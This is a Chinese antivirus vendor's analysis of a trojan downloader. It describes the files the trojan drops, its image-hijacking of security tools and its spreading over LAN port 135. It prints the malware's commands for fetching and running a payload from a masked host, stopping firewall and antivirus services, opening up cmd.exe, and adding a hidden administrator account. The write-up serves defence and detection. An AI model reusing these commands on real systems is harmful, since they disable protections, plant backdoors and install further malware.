具有较强对抗能力的下载器又出现了。毒霸反病毒工程师在近日处理的病毒中，发现了一个可以严重破坏系统的下载器程序，它除了能够关闭安全软件，执行下载外，还会设法取得对用户电脑系统的完全控制权，试图将用户的电脑变成肉鸡。

　　病毒进入系统后，在系统盘中释放出大量的病毒文件，其中病毒主文件SoundMan.exe隐藏在%WINDOWS%目录中，而%WINDOWS%\system32\目录下则隐藏着interne.exe、Man.exe、qoq.exe、no1.ini、notepde.exe、note2.ini、ttjj5.ini等。

　　病毒修改注册表，以最快的速度完成对冰刃、木马克星、360安全卫士的映像劫持，使它们无法运行。病毒还试图劫持毒霸的进程，不过经检验无法成功。另外，它还会劫持系统的输入法模块和资源管理器，令用户无法手动查杀病毒和通过本机向外求援。除了映像劫持外，病毒也通过关闭进程、修改系统时间的方法来破坏其它多家知名安全软件的正常运行。

　　接着，病毒建立一个新的系统帐户，设法获得全部用户组的管理权限，让用户几乎完全无法操作电脑。在此之后，病毒就连接到病毒作者指定的远程地址，下载大量盗号木马到用户电脑中运行，把用户偷个一干二净。

　　偷完东西后，病毒不会就此停止运行。它会建立扫描程序，对用户系统的一些敏感端口进行扫描等行为，将用户电脑变成任由病毒作者（黑客）控制的“肉鸡”。并且，如果中毒电脑位于局域网中，病毒还会试图把自己传染到其它正常的电脑上，扩大自己的传染范围。

Win32.Troj.Downloader.vb.81920
病毒名称(中文):肉鸡猎人81920病毒别名:威胁级别:★★☆☆☆病毒类型:木马下载器病毒长度:81920影响系统:Win9x WinMe WinNT Win2000 WinXP Win2003
病毒行为:

这是一个木马下载器病毒。病毒为了隐藏自己，所取的病毒名描述信息都比较象系统正常信息。它除了会下载大量其它病毒外，还会严重破坏系统，关闭部分安全软件，映像劫持大量软件，并试图建立后门。

1.释放病毒文件
C:\Por.aed
C:\Documents and Settings\fish\Local Settings\
Temporary Internet Files\Content.IE5\2PF3QNZE\CA05MZGT.htm
C:\Documents and Settings\fish\Local Settings\
Temporary Internet Files\Content.IE5\C4DGV5NI\gx[1].jpg
C:\Documents and Settings\fish\Local Settings\
Temporary Internet Files\Content.IE5\R146ZVU7\notepde[1].jpg
C:\Program Files\360safe\safemon\safemes.dll
C:\WINDOWS\SoundMan.exe
C:\WINDOWS\system32\interne.exe
C:\WINDOWS\system32\Man.exe
C:\WINDOWS\system32\no1.ini
C:\WINDOWS\system32\note2.ini
C:\WINDOWS\system32\notepde.exe
C:\WINDOWS\system32\qoq.exe
C:\WINDOWS\system32\ttjj5.ini

2.创建服务并开启来加载文件，使其随系统启动

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
\CurrentVersion\Run\SoundMan SoundMan.exe
映像劫持大量程序,添加360Loader.exe 360Safe.exe 360tray
.exe IceSword Iparmor.exe kmailmon.exe ras runiep
镜象劫持为”Debugger”=”svchost.exe” 添加ctfmon.exe为”Debugger”=”SoundMan.exe”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\360Loader.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\360Loader.exe Debugger “svchost.exe”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\360Safe.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\360Safe.exe Debugger “svchost.exe”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\360tray.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\360tray.exe Debugger “svchost.exe”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\ctfmon.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\ctfmon.exe Debugger “SoundMan.exe”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\IceSword
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\IceSword Debugger “svchost.exe”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\Iparmor.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\Iparmor.exe Debugger “svchost.exe”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\kmailmon.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\kmailmon.exe Debugger “svchost.exe”
.
.
.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\ras
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\ras Debugger “svchost.exe”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\runiep
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\runiep Debugger “svchost.exe”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\taskmgr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT
\CurrentVersion\Image File Execution Options\taskmgr.exe Debugger “svchost.exe”

修改HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\ Explorer\Advanced\Folder\Hidden\SHOWALL不显示隐藏文件

删除安全软件的启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
kav KavPFW vptray runeip RavTask RfwMain 360Loader.exe ras 360Safe.exe 360Safetray

3.病毒生成文件中的网址由解密字符串得到
CA05MZGT.htm
gx[1].jpg
notepde[1].jpg

4.枚举进程 判断当前进程里是否有”fint2005.exe” “ehsniffer.exe” “iris.exe” 嗅探工具，不管有无都等待10分钟,连接网络

InternetOpenUrlA读取InternetReadFile http://xxxxxxxx.com/rc/1500/gx[1].txt里面的列表,下载http://xxxxxx.com/rc/1500/gx[1].jpg

到c:\\windows\system32\vbb.exe运行

“cacls.exe C:\WINDOWS\system32\cmd.exe /e /t /g everyone:F”给everyone用户组(就是所有人)对cmd.exe的完全控制,

cmd.exe /c net stop wscsvc&net stop sharedaccess&sc config sharedaccess start= disabled&sc config wscsvc

start= disabled&net stop KPfwSvc&net stop KWatchsvc&net stop McShield&net stop “Norton AntiVirus Server”

停止安全软件的服务。

5.搜索进程中是否含有kmailmon.exe kavstart.exe shstat.exe runiep.exe ras.exe MPG4C32.exe imsins.exe Iparmor.exe

360safe.exe 360tray.exe cacls.exe ccenter.exe 用TerminateProcess来结束

6.”cmd.exe /c net user new1 12369 /add&
net user new1 12369&
net user new1 /active:yes&
net localgroup administrators /add
添加一个new1管理员帐号密码12369,将这些信息写入%windir%\1.inf，然后调用rundll32.exe来修改Help and Support服务

C:\WINDOWS\system32\interne.exe，并删除1.inf.关闭临时登陆用户new1

“HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\new1″添加建值为0，（1为开启）

不能创建删除用户”cmd.exe /c net user new1 /del”

7.访问”http://webipcha.cn/ip/ip.asp”获取当前外网IP，”cmd /c route print|find “Default Gateway: “>c:\ip.txt”

获取网关地址到c:\ip.txt，然后从文件重读出网关地址，删除文件。

8.判断当前进程有没有avp.exe 有了修改日期2001年7月15日

9.释放扫描器qoq.exe（Dotpot PortReady Ver1.6） 到%windir%/system32/下，扫描网关上下C段的所有135端口开放的主机，

记录到Por.aed，扫描外网C段上4个段位的ip ,”cmd.exe /c move “c:\Por.aed” “%SystemRoot%\system32\Por.aed”&exit”

10.释放popo.exe到病毒运行当前目录读取Por.aed扫描出来的开135的IP地址 “cmd.exe /c start C:\\popo.exe ip &exit”

（如cmd.exe /c start C:\\popo.exe 192.1**.18.15 &exit 通过POPO.EXE进行扫字典密码破解）

11.扫描完毕删除qoq.exe, Por.aed, popo.exe